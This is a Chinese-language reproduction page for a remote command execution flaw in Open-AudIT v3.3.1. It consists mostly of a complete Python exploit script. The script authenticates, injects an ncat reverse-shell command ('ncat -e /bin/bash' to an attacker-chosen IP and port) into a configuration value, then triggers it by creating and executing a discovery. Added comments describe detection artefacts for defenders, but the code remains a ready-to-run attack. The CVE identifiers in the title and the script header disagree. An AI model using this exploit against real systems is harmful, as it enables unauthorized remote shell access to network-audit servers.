        (CVE-2020-12078)Open-AudIT v3.3.1 远程命令执行漏洞
    ====================================================
    
    一、漏洞简介
    ------------
    
    二、漏洞影响
    ------------
    
    Open-AudIT v3.3.1
    
    三、复现过程
    ------------
    
    ![](./resource/(CVE-2020-12078)Open-AudITv3.3.1远程命令执行漏洞/media/rId24.png)
    
        OpenAudIT-postauth-rce.py
        #!/usr/bin/python3
    
        # Exploit Title: Open-AudIT Professional v3.3.1 Remote Code Execution
        # Date: 22/04/2020
        # Exploit Author: Askar (@mohammadaskar2)
        # CVE: CVE-2020-8813
        # Vendor Homepage: https://opmantek.com/
        # Version: v3.3.1
        # Tested on: Ubuntu 18.04 / PHP 7.2.24
    
        import requests
        import sys
        import warnings
        import random
        import string
        from bs4 import BeautifulSoup
        from urllib.parse import quote
    
        warnings.filterwarnings("ignore", category=UserWarning, module='bs4')
    
    
        # NOTE(review): the page files this script under CVE-2020-12078 while the
        # header comment above cites CVE-2020-8813 — confirm which identifier
        # applies before reusing either as a label in detections or reports.

        # Exactly five positional arguments are expected after the script name.
        _expected_argc = 6
        if len(sys.argv) != _expected_argc:
            print("[~] Usage : ./openaudit-exploit.py url username password ip port")
            exit()

        # Unpack the positional arguments; the functions below read these
        # names as module globals rather than taking parameters.
        url, username, password, ip, port = sys.argv[1:6]

        # A single session object so the authentication cookie obtained by
        # login() is reused by every later request.
        request = requests.session()
    
        def inject_payload():
            """Store the command string in Open-AudIT configuration item 90.

            Sends an authenticated PATCH whose body carries a JSON document with
            the ``value`` attribute set to a shell command built from the module
            globals ``ip`` and ``port``. Nothing executes at this point: the
            value is only persisted server-side and is consumed later by the
            discovery run (see start_discovery). Also reads the globals ``url``
            and ``request``. Returns None; the HTTP response is not checked.

            Detection note: a PATCH to ``/en/omk/open-audit/configuration/<id>``
            whose value contains shell metacharacters is the log artefact of
            this step; the configuration value itself can be audited afterwards.
            """
            configuration_path = url+"/en/omk/open-audit/configuration/90"
            # The body is sent as a raw string (not as a JSON-encoded request),
            # exactly as the original does; ``%s`` fills in ip and port.
            data = 'data={"data":{"id":"90","type":"configuration","attributes":{"value":";ncat${IFS}-e${IFS}/bin/bash${IFS}%s${IFS}%s${IFS};"}}}' % (ip, port)
            # Status code and body are ignored; a failed PATCH is reported as success.
            request.patch(configuration_path, data)
            print("[+] Payload injected in settings")
    
    
        def start_discovery():
            """Create a discovery through the web UI and request its execution.

            Fetches the discovery-creation form to read the access token, posts
            a minimal discovery definition, then follows the ``Location`` header
            of the reply to the ``/execute`` action of the new discovery. Reads
            the module globals ``url`` and ``request``. Returns None; neither
            HTTP response is inspected.

            Detection note: a discovery create followed closely by a GET on
            ``/discoveries/<id>/execute`` from the same session, shortly after a
            PATCH on ``/configuration/``, is the sequence a defender would
            correlate in the web-server access log.
            """
            discovery_path = url+"/en/omk/open-audit/discoveries/create"
            post_discovery_path = url+"/en/omk/open-audit/discoveries"
            # Ten random uppercase letters as the discovery name — presumably so
            # repeated runs do not collide on an existing name.
            scan_name = "".join([random.choice(string.ascii_uppercase) for i in range(10)])
            req = request.get(discovery_path)

            response = req.text
            soup = BeautifulSoup(response, "html5lib")
            # Assumes the access token is the sixth <input> element of the page;
            # this is layout-dependent and not validated (IndexError otherwise).
            token = soup.findAll('input')[5].get("value")
            buttons = soup.findAll("button")  # not used below
            headers = {"Referer" : discovery_path}
            # Form fields mirror the discovery-creation form; most are left empty.
            # The subnet below is a hard-coded placeholder value.
            request_data = {
            "data[attributes][name]":scan_name,
            "data[attributes][other][subnet]":"10.10.10.1/24",
            "data[attributes][other][ad_server]":"",
            "data[attributes][other][ad_domain]":"",
            "submit":"",
            "data[type]":"discoveries",
            "data[access_token]":token,
            "data[attributes][complete]":"y",
            "data[attributes][org_id]":"1",
            "data[attributes][type]":"subnet",
            "data[attributes][devices_assigned_to_org]":"",
            "data[attributes][devices_assigned_to_location]":"",
            "data[attributes][other][nmap][discovery_scan_option_id]":"1",
            "data[attributes][other][nmap][ping]":"y",
            "data[attributes][other][nmap][service_version]":"n",
            "data[attributes][other][nmap][open|filtered]":"n",
            "data[attributes][other][nmap][filtered]":"n",
            "data[attributes][other][nmap][timing]":"4",
            "data[attributes][other][nmap][nmap_tcp_ports]":"0",
            "data[attributes][other][nmap][nmap_udp_ports]":"0",
            "data[attributes][other][nmap][tcp_ports]":"22,135,62078",
            "data[attributes][other][nmap][udp_ports]":"161",
            "data[attributes][other][nmap][timeout]":"",
            "data[attributes][other][nmap][exclude_tcp_ports]":"",
            "data[attributes][other][nmap][exclude_udp_ports]":"",
            "data[attributes][other][nmap][exclude_ip]":"",
            "data[attributes][other][nmap][ssh_ports]":"22",
            "data[attributes][other][match][match_dbus]":"",
            "data[attributes][other][match][match_fqdn]":"",
            "data[attributes][other][match][match_dns_fqdn]":"",
            "data[attributes][other][match][match_dns_hostname]":"",
            "data[attributes][other][match][match_hostname]":"",
            "data[attributes][other][match][match_hostname_dbus]":"",
            "data[attributes][other][match][match_hostname_serial]":"",
            "data[attributes][other][match][match_hostname_uuid]":"",
            "data[attributes][other][match][match_ip]":"",
            "data[attributes][other][match][match_ip_no_data]":"",
            "data[attributes][other][match][match_mac]":"",
            "data[attributes][other][match][match_mac_vmware]":"",
            "data[attributes][other][match][match_serial]":"",
            "data[attributes][other][match][match_serial_type]":"",
            "data[attributes][other][match][match_sysname]":"",
            "data[attributes][other][match][match_sysname_serial]":"",
            "data[attributes][other][match][match_uuid]":""

            }
            print("[+] Creating discovery ..")
            # allow_redirects=False keeps the redirect reply so its Location
            # header can be read; if the server does not redirect, the next
            # line raises KeyError.
            req = request.post(post_discovery_path, data=request_data, headers=headers, allow_redirects=False)
            disocvery_url = url + req.headers['Location'] + "/execute"
            print("[+] Triggering payload ..")
            print("[+] Check your nc ;)")
            # The reply to the execute request is discarded; the script has no
            # in-band way to tell whether the discovery actually ran.
            request.get(disocvery_url)
    
    
        def login():
            """Authenticate the shared session against the Open-AudIT login form.

            Posts the module-level ``username`` and ``password`` to
            ``/en/omk/open-audit/login`` using the module-level ``request``
            session (so the resulting cookie is kept) and reports success by
            checking the response body for the product's failure message.

            Returns:
                True when the failure message is absent, False otherwise.
            """
            credentials = {
            "redirect_url": "/en/omk/open-audit",
            "username": username,
            "password": password
            }
            reply = request.post(url+"/en/omk/open-audit/login", credentials)
            # Success is inferred only from the absence of the error text;
            # the status code is not examined.
            failed = "There was an error authenticating" in reply.text
            return not failed
    
        # Entry sequence: authenticate first; only on success run the two
        # steps in order (store the configuration value, then create and
        # execute the discovery).
        if not login():
            print("[-] Cannot login!")
        else:
            print("[+] LoggedIn Successfully")
            inject_payload()
            start_discovery()
    
    